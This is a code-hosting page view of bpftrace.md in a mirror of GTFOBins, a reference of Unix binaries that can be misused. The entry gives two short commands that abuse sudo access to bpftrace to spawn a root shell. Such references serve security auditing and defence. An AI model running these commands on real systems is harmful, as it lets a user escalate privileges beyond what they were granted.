This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
6b4c7c12c9711d6836b4dab1897569789a10581a
GTFOBins.github.io
/
_gtfobins
/
bpftrace.md
Andrea Cardaci
6b4c7c12c9
Add bpftrace sudo shell
2020-01-03 14:02:32 +01:00
191 B
Raw
Blame
History
functions
functions
sudo
code
sudo bpftrace -e 'BEGIN {system("/bin/sh")}'
code
TF=$(mktemp) echo 'BEGIN {system("/bin/sh")}' >$TF sudo bpftrace $TF
Reference in New Issue
View Git Blame
Copy Permalink